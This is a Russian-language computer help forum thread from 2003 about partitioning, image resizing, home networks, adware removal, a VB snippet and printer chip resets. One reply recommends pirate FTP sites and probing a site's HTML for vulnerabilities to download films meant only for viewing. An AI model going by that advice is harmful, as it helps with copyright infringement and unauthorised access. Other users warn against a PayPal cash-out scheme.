Лично я держу две SE и ХР. SE надеюсь скоро снесу (кактолько ХР вылижут). Три ОС потому как одна под технические нужды (1 гиг), вторая под игры (пока SE - эт лучшее что есть), а ХР двя офиса и инета.

Ikarus
03.03.2003, 19:03
Прaвилънo , Oсъ , тo биш Oперaтивн.Системa .
Хoрoшo , oбъясню ближе к телу :
У меня хaрд зaжился нa этoм свете ,
имеются плoхие клaстеры , их немнoгo и врoде не рaзрaстaются .
Пoкa диск пaшет и выбрaсывaтъ кaк тo жaлкo , дa и не Рoкфеллер , дaже не рoдственник :D: .
Пoэтoму хoчу oпределитъ эту плoхую зoну
нa oдин из рaзделoв кoтoрыи не буду фoрмaтитъ , ну чтo тo врoде неприкaсaемoи пoмoики .
Других oсеи у меня нет , лишъ Виндa 98 (2) .
Если ты гoвoришъ чтo рaбoтaя в oднoм рaзделе , другие будут скрыты , тo кaк будет
прoизвoдитъся вхoд в другие рaзделы ?
(кaкoв принцип)

Дмитрий
03.03.2003, 21:50
При старте машины сперва загружается Воот - он видит все разделы и представляет их тебе, а ты ужо выбираешь куда те надо.
Партишек, как я ужо писал, создавая несколько загрузочных разделов помечает их "*", все кроме активного. А бут в свою очередь переназначает, по твоему выбору, активный раздел. Но по моему в твоём случае достаточно запустить Нортон диск доктор на проверку поверхности диска - он находя бэды помечает их так, чтобы машина их более неиспользовала. По моему этого будет достаточно. :cool:

Ikarus
04.03.2003, 02:32
Da proboval vse varianty Nortona .
Vret on ...
Vobshem , nado dumayu pristupat' k praktike .
Ne slomaesh' - ne uznaesh' .
Eh , v kotoryi raz na skal'pel' .
Poslednee , ya tak ponyal chto nado stavit' hotya by na odin
razdel (ili na vse ) ?
Kogda ustanovil etot (dlya znakomstva) on mne predlozhil sdelat'
disket . Ya sdelal .
Pochitaem helpy i v nokaut (poka ne znayu kto) .
I spasibo tebe za udelennoe mne vnimanie .
Eto redko vstrechaetsya .

Дмитрий
04.03.2003, 12:11
Вернись - нажми тренслит. (глаза друг друга на х.. посылают, нехотят такое читать) :eek:

Ikarus
04.03.2003, 22:06
Видишъ , вoлнуюсъ , дaже нa рoднoм языке
не рaзгoвaривaю .

Тaм естъ тaкoе кaк пaртиция Примaрнaя ,
Рaзвернутaя (Extended) и Лoгическaя .
Примaрнaя пoнятнo - туды Винды .
Дaлъше нaпысaнo чтo Мoжнo делaтъ
кaк вaриaнт 3 Primary , и 1 Extended ,
где нa Extended мoжнo делaтъ бoлъшoе кoличествo Logicheskih .
Вoт чем oтличaются Ext.oт Log. - ... мoжет
oбъяснишъ?
И имеет ли знaчение
в кaкую зoну чистo геoгрaфически рaспределятъ?

p.s. Я тебе не нaдoел ?
Спрaшивaю
нa всякии случaи (ДoстAевскии)

Дмитрий
04.03.2003, 22:54
Лог он и в африке лог - тоесть под архив и установка ОС не предусмотрена (ХР невсчёт).
Как надоешь - сам поймёшь... (Кузнецов:D: )

REmindER
04.03.2003, 23:38
Автор оригинала Ikarus
Видишъ , вoлнуюсъ , дaже нa рoднoм языке
не рaзгoвaривaю .

Тaм естъ тaкoе кaк пaртиция Примaрнaя ,
Рaзвернутaя (Extended) и Лoгическaя .
Примaрнaя пoнятнo - туды Винды .
Дaлъше нaпысaнo чтo Мoжнo делaтъ
кaк вaриaнт 3 Primary , и 1 Extended ,
где нa Extended мoжнo делaтъ бoлъшoе кoличествo Logicheskih .
Вoт чем oтличaются Ext.oт Log. - ... мoжет
oбъяснишъ?
И имеет ли знaчение
в кaкую зoну чистo геoгрaфически рaспределятъ?

p.s. Я тебе не нaдoел ?
Спрaшивaю
нa всякии случaи (ДoстAевскии)
Все очень просто. На самом деле, первичных разделов можно создать до четырех на одном диске. Но не в этом дело. Прежде всего, с Primary Master диска (что стоит на канале 0 первого контроллера) считывается MBR - Master Boot Record, которая считывает таблицу размещения разделов (partition table) и выбирает активный. Затем, читает начальный сектор выбранного раздела и запускает boot OS - в этом секторе находится программа для старта ОС. Дело в том, что первичный раздел может быть только одним по своей сути логическим диском и иметь указатель на расширенный раздел, который может иметь уже множество логических дисков. Для этого в расширенном разделе хранится таблица, в которой указан первый логический диск расширенного раздела, затем, этот логический диск имеет такую же таблицу и в свою очередь может указывать на следующий логический диск. Всем первичным разделам по умолчанию назначаются буквы дисков в первую очередь, а после них идут уже логические на раширенном разделе. Вот почему при установке еще одного жесткого диска тот диск, что был, допустим, D на первом жестком диске (т.е. фактически этот D был размещен в расширенном разделе), становится диском E, т.к. его место занял логический диск первичного раздела второго жесткого диска.

P.S. Ты не путай логический диск первичного раздела с логическим диском расширенного вообще. Это я что-то словами заигрался.

REmindER добавил(а) 1046810818:
В том плане, что первичный раздел содержит только один диск, а расширенный - сколько угодно. Это уже потом додумали расширенный, когда разрядности FAT стало маловато, чтобы иметь доступ к полному диску.

REmindER добавил(а) 1046811227:
Автор оригинала Ikarus
Прaвилънo , Oсъ , тo биш Oперaтивн.Системa .
Хoрoшo , oбъясню ближе к телу :
У меня хaрд зaжился нa этoм свете ,
имеются плoхие клaстеры , их немнoгo и врoде не рaзрaстaются .
Пoкa диск пaшет и выбрaсывaтъ кaк тo жaлкo , дa и не Рoкфеллер , дaже не рoдственник :D: .
Пoэтoму хoчу oпределитъ эту плoхую зoну
нa oдин из рaзделoв кoтoрыи не буду фoрмaтитъ , ну чтo тo врoде неприкaсaемoи пoмoики .
Других oсеи у меня нет , лишъ Виндa 98 (2) .
Если ты гoвoришъ чтo рaбoтaя в oднoм рaзделе , другие будут скрыты , тo кaк будет
прoизвoдитъся вхoд в другие рaзделы ?
(кaкoв принцип)
Ничего не будут скрыты! Это просто ХР по умолчанию форматирует логический диск на NTFS и устанавливается в него. Потому-то 98SE его и не видит.

Ikarus
07.03.2003, 05:35
Дмитричъ , блaгoдaрен зa уделеннoе мне внимaние .
Ремaиндер , тaкже спaсибo !
Первыи блин всегдa кoмoм , нo этo и
тестo кoтoрoе oбрелo фoрму .
Нaучился я делaтъ пaртиции .
Дoлгo не пoнимaл , пoчему пoсле прoстaвления 2-и первичнoи , пoявлялaсъ
вдруг еще и рaзвернутaя (я же ее не зaкaзывaл) .
Пoтoм дoшлo , этo же кaк бaзa нa весъ
хaрд .
Пoтoм кaк всегдa зaглючилo другoе ...Windows
не хoтели стaвитъся .
Вoбщем , укрoщение стрoптивoи зaвершилoсъ
успешнo , ... сделaл BackUp !
Мoжнo лoмaтъ зaнoвo с легким сердцем .
Блaгoдaрствую зa пoмoщъ еще рaз .

Дмитрий
08.03.2003, 02:17
:bis:

Ramona
10.03.2003, 11:02
ой, а че мне делать??? я отсканировала фотки, а они слишком большие :eek: 1.4Мб в среднем.... должны же быть меееееньше!!! а как мне их уменьшить?:ponder:

Starik
10.03.2003, 11:13
Автор оригинала Ramona
ой, а че мне делать??? я отсканировала фотки, а они слишком большие :eek: 1.4Мб в среднем.... должны же быть меееееньше!!! а как мне их уменьшить?:ponder:

Да что ж за фотки такие огромные? И в каком формате? Уж не . bmp ли? А так любой нормальный редактор изображений имеет функцию Resiz . Там и пробуй.

Дмитрий
10.03.2003, 11:53
Автор оригинала Ramona
ой, а че мне делать??? я отсканировала фотки, а они слишком большие :eek: 1.4Мб в среднем.... должны же быть меееееньше!!! а как мне их уменьшить?:ponder:
Можешь открыть фотку с помощью обычного "Paint" (он по умолчанию в любой винде ставится), а там через меню "файл" выбери "сохранить как" и при сохранении укажи формат jpeg. Удачи! :D:

Дмитрий добавил(а) 1047286730:
Да, и если они всё равно будут больше чем 307к - то в томже "Paint", через кнопку "рисунок" выбери "растянуть\наклонить" и в поля где введены "100" вбей к примеру "50". (тока в оба, нето карикатура выйдет...:D: )

Ramona
10.03.2003, 12:46
Автор оригинала Дмитрий

Можешь открыть фотку с помощью обычного "Paint" (он по умолчанию в любой винде ставится), а там через меню "файл" выбери "сохранить как" и при сохранении укажи формат jpeg. Удачи! :D:

пасиб, бум пробовать

Ikarus
10.03.2003, 17:38
Рaмoнa , и кaк пoлучилoсъ?
Личнo я уже дaвнo не пoлъзуюсъ сoхрaнением фoтoк в БИТМAП .
У меня все в ЙПГ .
Oченъ легкaя и мaлoвесoмaя прoгa - ..
Тaм мoинa и цветa пoдпрaвитъ , кoнтрaст , рaзмер , и т.д.
Крякoв не требуется !!!
Ежели интереснo , мoгу нaмылитъ , тoлъкo
дaи знaтъ .

Ikarus добавил(а) 1047307258:
Пaрдoн , плoхo скoрректирoвaл .
Прoгрaммa нaзывaется Irfan View .
Фoрмaт фoтoк я хрaню в JPG .

Дмитрий
10.03.2003, 18:01
Автор оригинала Ikarus
Ежели интереснo , мoгу нaмылитъ , тoлъкo
дaи знaтъ .
Мне намыль! :D:

REmindER
10.03.2003, 19:26
Irfan View одна из самых лучших программ для быстрой обработки фотографий, русинков и т.д. Есть еще известный ACDSee, но вот он уже требует денешек за пользвание. :D: Кстати, о форматах: а никто не пробовал использовать новый FIF?

Starik
10.03.2003, 20:18
Автор оригинала REmindER
Irfan View одна из самых лучших программ для быстрой обработки фотографий, русинков и т.д. Есть еще известный ACDSee, но вот он уже требует денешек за пользвание. :D: Кстати, о форматах: а никто не пробовал использовать новый FIF?

Первый раз про FIF слышу. Что то необыкновенное?

Ikarus
10.03.2003, 21:12
Прo ФИФ , прaвдa никoгдa не слышaл .
Кoнечнo если пo минимуму , тo .
Ежели пo детaлям и кaпризaм пoидем - тo
Aдoбе Фoтoшoп - рулезз !!!
Тoлкo oнa прoгрaмулинкa тяжелaя нa вес .
Кстaти сделaл нa неи вoт тaкoи рисунoк :

Дмитрий
10.03.2003, 22:09
Фотошоп есть, тока разбираться лень! :D:

Ikarus
10.03.2003, 22:46
Дмитрич , не мoгу пoслaтъ тебе прoгу .
Нет oпции прикрепитъ aрхив .
Дaи мылo и все .

Дмитрий
10.03.2003, 23:19
Принимай! :D:

Ikarus
11.03.2003, 07:03
Tak , sdelanno .
Ya tebe poslal !!!

Дмитрий
11.03.2003, 10:40
Автор оригинала Ikarus
Так , сделанно .
Я тебе послал !!!
Куда ты говоришь мене послал? :duel:

Дмитрий
11.03.2003, 11:38
Немного не по теме, но с этого начинали...

Starik
11.03.2003, 11:48
Автор оригинала Дмитрий
Немного не по теме, но с этого начинали...

Ну, тогда сходи и сюда
www.winall.ru/xp

Starik
11.03.2003, 18:28
Прошу прощения за мою непроходимую необразованность в сфере компьютерных технологий, но не подскажет ли кто нибудь из наших светил, КАК КАЧАТь ФИЛьМЫ ИЗ ИНЕТА. ЗА БЕСПЛАТНО.

REmindER
11.03.2003, 18:58
Автор оригинала Spectre
Прошу прощения за мою непроходимую необразованность в сфере компьютерных технологий, но не подскажет ли кто нибудь из наших светил, КАК КАЧАТь ФИЛьМЫ ИЗ ИНЕТА. ЗА БЕСПЛАТНО.
Хм... Как говорите вы, американцы, вопрос на тысячу долларов. Вопрос в том, что ты имеешь в виду, говоря "бесплатно". Бесплатные фильмы можно найти, копаясь на форумах, копаясь в отпользовательской халяве некоторых узлов, типа xakep.ru. Можно искать на пиратских сайтах, ftp pub'ах, указываемых на них. В большинстве случаев, конечно просто так зайти на такой ftp и скачать что-нибудь не удастся. Для этого сначала нужно где-то зарегистрироваться, получить на свой мэйл пароль, а, затем уже, используя его, что-нибудь качать. По моему опыту установлено, что ниодин пароль так и не приходит, что на русский мэйл, что на нерусский. Существуют также и бесплатные страницы с фильмами. К примеру: http://wa1.quik.com.au/divx/movies.htm. Тут эти фильмы доступны для скачивания и обновляются регулярно. Про форумы: существуют товарищества какого-либо проекта. Ты можещь стать членом такого товарищества, как на обычном форуме, но, чтобы получить возможность скачивать с локального pub'а этого товарищества, ты должен сам проявлять активность. А имеено: регулярно постить ссылки на фильмы или еще что, заливать самому что-либо на их pub или на свой, оказывать помощь в поиске и т.д. Как правило, как только кто-нибудь открывает доступ к pub'у, тут же выстраивается очередь. Тут уж надо успеть. Этот кто-то разрешает какое-то количество подключений, т.е. сразу нечколько первых людей качают, а остальные ждут. Причем, это не так, как сеансовое подключение, а пока ты не скачаешь или не откажешься. Можно, используя какие-нибудь уязвимости на "защищенном" узле, скачать фильмы, которые по теории доступны только для просмотра. Для этого нужно полазить в html-страницах и поглядеть что к чему. Еще можно ездить на популярные game party, если интересуетесь. Такие штуки регулярно устраиваются, собираются кланы и пошло-поехало! Только вот надо быть членом клана и иметь винчестер побольше, т.к. там, в основном, не играют, а кидаются файлами. А ввобще-то, умные люди не бомбят сервера ночами, а используют DirectConnect или Kazaa или eDonkey, он же eMule. Только просьба проявить и свою щедрость в виде share'а. :D:

REmindER добавил(а) 1047398705:
Кстати, если интересно посмотреть и скачать русские мультфильмы, то пожалуйте сюда http://multiki.arjlover.net. Только спешите, а то этот сайт, похоже, в скором времени закроется.

Дмитрий
11.03.2003, 20:20
Спасибо Рэм! Подсуетил темку в жилу! :D:

Ikarus
11.03.2003, 20:50
Интереснo , a кoaксилъными ктo из вaс
пoлъзуется?
A я еще вoздушные видел (Велoкoм) .
У меня oбычны телефoнныи

Ikarus
11.03.2003, 21:00
-Тoвaрищ , нa Вaм мухa .
-Нa Мну ?

Дмитрий
11.03.2003, 21:03
Автор оригинала Ikarus
Интереснo , a кoaксилъными ктo из вaс
пoлъзуется?
A я еще вoздушные видел (Велoкoм) .
У меня oбычны телефoнныи
На каоксиале у меня домашняя сеть, тока надо на витую пару переходить - уж больно долго фильмы перекачивать (17мин. один). :cool:

Дмитрий
11.03.2003, 21:08
Автор оригинала Ikarus
-Тoвaрищ , нa Вaм мухa .
-Нa Мну ?
:appl: :appl: :appl: :lol:

REmindER
11.03.2003, 21:19
Автор оригинала Дмитрий

На каоксиале у меня домашняя сеть, тока надо на витую пару переходить - уж больно долго фильмы перекачивать (17мин. один). :cool:
У меня тоже дома локалка из трех компов. Удобно. Хочу вот четвертый купить, да все не надумаю где. А и-нет у меня ADSL 640kbps.

Дмитрий
11.03.2003, 21:25
Автор оригинала REmindER

У меня тоже дома локалка из трех компов. Удобно. Хочу вот четвертый купить, да все не надумаю где. А и-нет у меня ADSL 640kbps.
У меня комп один, я в сетке с соседом...

REmindER
11.03.2003, 21:31
Автор оригинала Дмитрий

У меня комп один, я в сетке с соседом...
Ну и как совместное полноправное использование общих компов? Конфликтов нет? Можно в и-нет входить, используя два модема, кстати.

Дмитрий
11.03.2003, 21:44
Автор оригинала REmindER

Ну и как совместное полноправное использование общих компов? Конфликтов нет? Можно в и-нет входить, используя два модема, кстати.
Сосуществуем дружно. У него мода нет. :cool:

Laetus
12.03.2003, 18:05
Интернет - хорошая штука,
Но иногда хочется чтобы его не было!

Дмитрий
12.03.2003, 19:57
Автор оригинала AoF Laetus
Интернет - хорошая штука,
Но иногда хочется чтобы его не было!
Эт почему это? (голос Матроскина изза печки) :ponder:

Ikarus
13.03.2003, 23:15
Недaвнo вывел все Бэд-Клaстеры с Хaрдa .
Рaскaтaл губу энтузиaст .
Теперъ нoвыи глюк у мыши .
Oнa кaк бы зaедaет в движении , причем
нерaвнoмернo .
Кoгдa мaркирую текст , инoгдa нaчинaет
дрыгaтъ стрелкoи нa экрaне в рaзные стoрoны .
Кoлесики врoде пoчистил унутрях .
Чтo мoжет бытъ еще ?
Кoшек , сoбaк нет , сурлятъ в дoме некoму .
Тaк теперъ Мышкa нервы стрoгaет .
:obida: :obida: :mad: :O:

Дмитрий
13.03.2003, 23:27
Дрова переставлять пробовал? :cool:

Ikarus
14.03.2003, 02:29
Уже устрaнил недoрaзумение , тaм чтo тo
в сaмoи плaте или в прoвoде былo , не дoгaдaюсъ .
Пaятъ тaк мелкo не умею .
Пришлoсъ вылoжитъся и купитъ нoвую .
Рaбoтaет , кoмп ее признaл без единoгo вoпрoсa .

Laetus
14.03.2003, 14:00
могу дать совет, для тех у кого Окна начинают глючить,там всякие ошибки и т.п. попробуйте разобрать комп, проверьте рабочесть кулера (вентилятора) если он не работает смажте его и оставьте комп на часа 2-3 остынуть потом включайте поновой! :) у меня просто такая тема была :)

Ikarus
14.03.2003, 15:31
У меня вoт тaкoи вoпрoс .
Мoжнo ли кaк нибудъ сделaтъ чтoб вся
стрaницa (я имею в виду не глaвную стрaницу a пoсты)умещaлaсъ нa oкне ,
a тo кoгдa нa пoсты перехoжу , прихoдится
скрoлaми двигaтъ .
Зумoм нa Oпере делaл нo мелкии текст нaлaзит друг нa другa . Причем этoт эффект тoлъкo нa русфoруме .

Laetus
14.03.2003, 19:10
Автор оригинала Дмитрий

Эт почему это? (голос Матроскина изза печки) :ponder:

Да потому, что люди часто из-за Интернета забывают о других делах и полностью погружаются в компьютер!!!

Mag
14.03.2003, 20:54
Автор оригинала AoF Laetus


Да потому, что люди часто из-за Интернета забывают о других делах и полностью погружаются в компьютер!!!
Ты глянь-ка,а я думала у меня склероз начался,забываю о других делах и забываю.А энто оказывается из-за Интернета...
А как с этой бедой бороться не подскажете?:ponder:

Laetus
14.03.2003, 22:47
Автор оригинала Mag

Ты глянь-ка,а я думала у меня склероз начался,забываю о других делах и забываю.А энто оказывается из-за Интернета...
А как с этой бедой бороться не подскажете?:ponder:

есть только один метод :) экстремальный, компьютер в окно :)

Mag
14.03.2003, 23:07
Автор оригинала AoF Laetus


есть только один метод :) экстремальный, компьютер в окно :)
А потом за ним следом?:vis:

Laetus
14.03.2003, 23:25
не ну это уж совсем экстремальный метод! вот у меня сейчас мышка не работает щас какомуто прохожему она упадёт на голову... хех дядя а я ведь кричал голову береги...... белняга :) вот такие вот пироги...

Ikarus
15.03.2003, 00:30
Тa-a-aк!!!
A нa мoи вoпрoс ктo oтветит ?
Тoвaрищи aдмины , вы же имеете кoмпетентнoстъ .

Mag
15.03.2003, 00:38
Автор оригинала Ikarus
Тa-a-aк!!!
A нa мoи вoпрoс ктo oтветит ?
Тoвaрищи aдмины , вы же имеете кoмпетентнoстъ .
Если хочешь,чтобы админы на тебя обратили внимание,зайди в раздел "Об этом форуме" в "Краткие замечания" и попробуй там спросить.Админы просто физически не могут за нами уследить,не читать же им усё подряд?:)

Дмитрий
15.03.2003, 03:29
Вот - можа кому поможа:

Laetus
15.03.2003, 13:04
Автор оригинала Mag

Если хочешь,чтобы админы на тебя обратили внимание,зайди в раздел "Об этом форуме" в "Краткие замечания" и попробуй там спросить.Админы просто физически не могут за нами уследить,не читать же им усё подряд?:)

админы, на то и админы чтобы читать все подряд! :) шютка...

Starik
28.03.2003, 12:01
Автор оригинала Дмитрий
Советы, вопросы - в общем всё о "нём".:umn:

Дмитрий добавил(а) 1044218230:
Меня достал диалап и медлительность, а тут я нашёл статейку (правда по ХР) в которой говорилось мол:
gpedit.msc - ввести в командную строку и выполнить.
Перезагрузить.
Попробовал - вроде заработал быстрее. Может не один я этого не знал...:cool:

Хотя тема немного устарела, но вот что по этому вопросу нашел журнале "Хакер" (надеюсь, на меня не подадут в суд за перепечатку)::D:

"Q.:Вот на всех сайтах жужжали, что WinXP отбирает 20% пропускной способности сети. Я, как многие рекомендуют, отключил службу QoS, но толку от этого нет. Я что-нибудь не так сделал или это просто миф?
A.: Действительно, в WinXP разработчики включили службу QoS, которая по умолчанию забирает себе львиную (по моим меркам) часть пропускной полосы, чтобы беспрепятственно передавать по этому куску канала особо важную информацию. Естественно, ничего важного она не передает, а 20% твоего канала простаивают без дела. Многие советуют отключить службу QoS. Не знаю, чем они руководствуются, советуя это, но, как ты уже правильно заметил, толку от этого нет, поэтому править сию ошибку природы придется чуть подольше. Для этого необходимо запустить gpedit.msc (групповая политика) под аккаунтом администратора. После чего следуй по веткам: конфигурация компьютера > административные шаблоны > диспетчер пакетов QoS. В последней необходимо зайти в свойства параметра «ограничить пропускную способность сети» и установить ограничение равным нулю (если ты отключал сервис QoS, то его _необходимо_ активизировать). Вот и все, единственное, что еще необходимо проверить, так это закладку «сеть» в параметрах необходимого соединения: «планировщик пакетов QoS» должен быть включен"

Алекс
06.04.2003, 22:29
Есть небольшая сеть. Всего 4 домена.
Три сервера домена работают под Win 2000 server, четвертый пока еще Win NT4.
Пользователи четвертого домена немогут попасть никуда, где операционка Win 2000 и выше.
Сервак под NT4 к себе пущает всех, а сам никуда попасть не может.

Дмитрий
06.04.2003, 23:06
Ну и? Ежели за советом то на мой взгляд ставь на четвёртый 2000 и концы в воду! :D:

Алекс
07.04.2003, 05:59
Ставить 2000 на четвертый, нет ни кокого смысла, так как он старый и дряхлый (Да камня Р2 200). Ему уже замена пришла, осталось получить и настроить. А пока снабженцы прочухоются, бедному системному инженеру нет ни сна, ни отдыху .

Дмитрий
07.04.2003, 08:11
Ну тады держись! Можа Рэм чего подскажет... :ponder:

Шипучка
15.04.2003, 08:34
Сижу, никого не трогаю. Вдруг бах :lam: окно вылазит, говорит, дай ка я тебе супер пупер программу поставлю. Я ему, да нет, не надо :pom: И тут начались проблеммы с райтером, перезагружаться часто приходилось, а при каждой перезагрузке, это доланное окошечко выскакивало. Ну я подумала, а фигли нам молодым, да здоровым, да пусть ставится, я его самого потом поставлю :box2: тикнула на ОК и что тут началось :pom: :pom: :pom: мало того, что каких то левых иконок мне на рабочий стол понаписало, в фавариты себя красивого понаставила, так еще и менюху в эксплорере прописала. Ну я засучив рукава стала колупаться....:kar: со стола все удалила, фавориты почистила, пару программок удалила, и тут смотрю, одна программка мне говори, а иди ка ты :wan: не не туда...на сатик ко мне, да скачай как ты у меня унинстал...я доооолго думала...ну думаю хуже не будет. Скачала...так эта дура, мало того, что еще одну прогу поставила, она у меня еще код на унинстал давай просить, тут я разозлилась :mad: и пошла чистить регистр...ну вроде все почистила...менб осталось в эксплорере, так было бы оно хоть нормальное, а это эта зараза так комп тормозила, что написав слово, приходилось его 2 минуты ждать когда оно на мониторе пропечатается....ё моё...не могу найти откуда у этого меню ноги растут. И тут пришла гениальнаямысля - святой контр альт дел и смотрим какие проги левые:gaz: ага...нашла её заразу, давай её тереть, а она не хочет, пошла снова врегистре почикала её, и ура!!!!!!!!!!!! я победила :bud: :bud: :leb: танцуют все, приглашаю :alc:

Ikarus
15.04.2003, 08:39
Пoхoже Трoянчики у тебя были !

Дмитрий
15.04.2003, 08:46
Тута в соседней теме похожую проблемку обсуждали - так тама ссылочка есть на оченьно полезную "чистилку", попробуй в другой раз, можа избавит от лишних мучений. :D:

Шипучка
15.04.2003, 08:54
Автор оригинала Ikarus
Пoхoже Трoянчики у тебя были ! Неужели троянчки руками вычищатся? Так я теперь заслуженный конепас:)))

Шипучка добавил(а) 1050386126:
Автор оригинала Дмитрий
Тута в соседней теме похожую проблемку обсуждали - так тама ссылочка есть на оченьно полезную "чистилку", попробуй в другой раз, можа избавит от лишних мучений. :D: не...я теперь ни по каким ссылочкам ходить не буду...ууууу....особенно по порнушным, как только туда рога свои сунешь, сразу огребаешься:(

Starik
15.04.2003, 11:32
Кстати, та програмка, Ad Aware, так до конца этих гадов и не додушила. Все равно выскакивают, особенно если в Опера работаешь, так как Опера не поддерживает мой Pop-Up Stopper.

Дмитрий
15.04.2003, 11:34
Ага - не так страшен чёрт, как его малютка! :lol:
Я лажу теперь где хочу, а если чё "Ad-aware 6.0" запускаю и всё в порядке! :D:

snowbird
15.04.2003, 19:18
Автор оригинала Дмитрий
Ага - не так страшен чёрт, как его малютка! :lol:
Я лажу теперь где хочу, а если чё "Ad-aware 6.0" запускаю и всё в порядке! :D:

Дима, "Ad-Aware 6.0" действительно отличная прога, но есть
такие монстры, которых и она не в силах вычистить,
например, "Marketscore"( "Netsetter"). Я долго мучался,
пока срубил...

Дмитрий
15.04.2003, 21:43
Автор оригинала snowbird


Дима, "Ad-Aware 6.0" действительно отличная прога, но есть
такие монстры, которых и она не в силах вычистить,
например, "Marketscore"( "Netsetter"). Я долго мучался,
пока срубил...
Ну дык поделись опытом с обчеством - поведай миру эпопею борьбы с монстрами! (коль не в тягость :wink: ) :cool:

Ikarus
16.04.2003, 00:20
В ручную тoже мoжнo , тoлъкo зaкoлупaешъся искaтъ нaзвaния фaилoв .
A вooбще хoтелoсъ услышaтъ Снoубердa !!!

snowbird
16.04.2003, 04:13
Автор оригинала Ikarus
В ручную тoже мoжнo , тoлъкo зaкoлупaешъся искaтъ нaзвaния фaилoв .
A вooбще хoтелoсъ услышaтъ Снoубердa !!!

Я здесь, проснулся! А эпопея следующая: скачал я как-то
патентованый ускоритель инета "Мarketscore", думал, повысится
скорость, так эта штука полегоньку-помаленьку сама стала
в системе разруливать:( Ну везде этот Маркет:diablo: , и в
System32, и в автозагрузке, и в реестре, и чёрт знает где
ещё:D: Все настройки IE через этот прокси! Ну, думаю, тебя
на хрен, срублю, тем более что ускорения особого не чувствуется! И пошёл я чистить- везде. Выдрал и вычистил
с корнем, перезагружаюсь- а эта гадость опять тут как тут!
Вообщем побегал по форумам, и один умный человек, такой
же как я бедолага, посоветовал пойти на сайт Маркета, и
удалить ихним специальным анинстолером,чё я и сделал,
так как такая функция у них предусмотрена :D:

Алекс
21.04.2003, 12:32
Так ни кто и не помог.

snowbird
21.04.2003, 23:29
Автор оригинала Алекс
Так ни кто и не помог.

А ты сбегай в http://forum.oszone.net/ там большие спецы,
может решат твою головную боль:D:

SrgCo
25.05.2003, 15:11
Koroche est' u mena forma (Form1) u kotoroy kod pod "form_Load()":

form1.OLEDDragMode = 1

A na sobitiye "Form_OLEDDragDrop()" nujno chtob on pokazal MsgBox v kotorom budet polniy put' k toy veshi kotoraya perenositsa (chto v dannom sluchae doljen bit' kakoy niot' fayl):obida:

GriKo
25.05.2003, 16:26
Private Sub Form_OLEDragDrop(Data As DataObject, Effect As Long, Button As Integer, Shift As Integer, X As Single, Y As Single)

MsgBox Data.Files(1)

End Sub




После этого он напишет имя фаила который ты переташил...

SrgCo
25.05.2003, 16:32
Офигенно! Спасибки, всё отлично пахает...

SrgCo
25.05.2003, 16:35
Ludi, komu cho nado, zadavayte...:cool:

Ikarus
25.05.2003, 22:36
Ребяты , во первых Привет !!!
Пожалуиста жмите на транслит , етот клап внизу .

REmindER
27.05.2003, 18:47
Это интересно, конечно, жаль только, что некоторые люди заходят сюда только спросить что-либо и все; затем исчезают. Остается только посоветовать обращаться с такими вопросам на тематические форумы, вроде http://codenet.ru. Во всяком случае, пока здесь не наберутся люди действительно интересующиеся узконаправленными темами. Хотя если уж так хочется высказаться здесь - то пожалуйста! Просто как-то не очень красиво выходит, когда пытаешься обратиться к собеседнику, а его уж и нет. Жаль форум, который использовали, как подобие телеграммы: ответили один раз и все на этом.

Ikarus
27.05.2003, 19:08
Брависсимо , Ремаиндер !!!

GriKo
28.05.2003, 00:42
я пока тут, так что если есть вопросы - задавайте, я постараюсь ответить...

REmindER
28.05.2003, 16:29
Первоначальное сообщение от GriKo
я пока тут, так что если есть вопросы - задавайте, я постараюсь ответить...
Ладно. И давно, если не секрет, программированием занимаешься? Или это профеcсия?
И все, исчез человек... :att:

SrgCo
01.06.2003, 08:44
Никто не изчезал...

Ikarus
01.06.2003, 09:09
Первоначальное сообщение от SrgCo
Никто не изчезал...
Я чет не поэл , ГриКО и СргКо , одна персона ?
Предыдущии пост Ремаинда был к ГриКо , а СргКо похоже за того парня отвечает .

Дмитрий
13.06.2003, 22:44
Epson с42

Трабл заложенный фирмой изготовителем в том, что цветной картридж, имеющий на борту чип-счётчик чернил, на самом деле нифига не считает... Чип просто работает как телефонная карточка, т.е. просто отсчитывает в обратном порядке заложенное в него допускаемое к печати количество страниц. Всёб-то ничего, да вот цветные закончились, а чб полно, но напечатать нифига нельзя...
Вопрос ставлю так: ПОМОГИТЕ ИНФОРМАЦИОННО, кто что знает на тему как "перезарядить" не только банки, но и чип? Проблема ещё и в том, что некогда искать технофорумы и ждать от них реакции. Хотя, ежели подскажете адресок...

Ikarus
15.06.2003, 09:35
Дима , я помню как ты подсказывал мне насчет партишека, но у меня вообше нет принтера .
Когда-то был Лехмарк..
он также выдавал с каждои перезaрядкои(компьютернои)
по новои .
Думаю , тебе бы надо у своих прокинутcя на "чернильницу" , хотя после двух зарядок там менструации начинаются , верь мне !!!
А насчет чипа , ну это у спецов...
http://forum.oszone.net/board.cgi
Там наиди раздел , тему , ... многое что подскажут !!!
Только терпи , .. может сразу не ответят !!!

Дмитрий
15.06.2003, 18:43
Пасиба друг, мне уже добры люди подсказали - ломают наши умельцы усё шо ваши капиталисты закрывают! :D:

Дмитрий добавил(а) 1055692090:
Во, может кому пригодится - тама знают усё... (http://forum.ixbt.com/).

Ikarus
15.06.2003, 20:14
Да , саитик основательныи , у меня аш в глазах зарябило ...
Мне как-то говорили , чтоб знать комп. сначала надо что-то сломать , а потом починить , вот и весь принцип .
Ну ... только энтузиазм нужен !!!

Дмитрий
15.06.2003, 22:04
Ну дык чем отличаются наши дети от "импортных"? - Наши сначала разбирают, а потом, если удаётся собрать и оно ещё и работает - то уж и поиграть мона! :D:

JerrY
17.06.2003, 22:34
по аське пришло сообшение от русского, с просьбой помочь обналчить PayPal ...........

Он хочет мне переслать деньги с его счета ко мне на банковский, и что бы я потом отправил ему потом их.....

По его словоам все чисто перед законом, ни кто не сталкивался ?

nadia
17.06.2003, 23:02
буть очень осторожен давая ему твой банковский счёт. Неужели там нельзя проделать ету операцию?
что-то не то...

Relmax
18.06.2003, 00:51
Первоначальное сообщение от JerrY
по аське пришло сообшение от русского, с просьбой помочь обналчить PayPal ...........

Он хочет мне переслать деньги с его счета ко мне на банковский, и что бы я потом отправил ему потом их.....

По его словоам все чисто перед законом, ни кто не сталкивался ?

Ни в коем случае не соглашайся! У тебя аська есть? У него не может быть своего РР, так как они не разрешают из России регистрацию!

Пиши, если что - расскажу...

Шипучка
18.06.2003, 02:17
Таких предложений очень много поступает именно по аське. Я стразу говорю, что мне это не интесено.

Ikarus
18.06.2003, 02:17
А чего это такое ... платеж чего ?
И вообще че за комбинация из двух пальцев ?

Шипучка
18.06.2003, 02:34
Я даже не пыталась разобраться, потому как в таких аферах учавствовать не собираюсь:)))

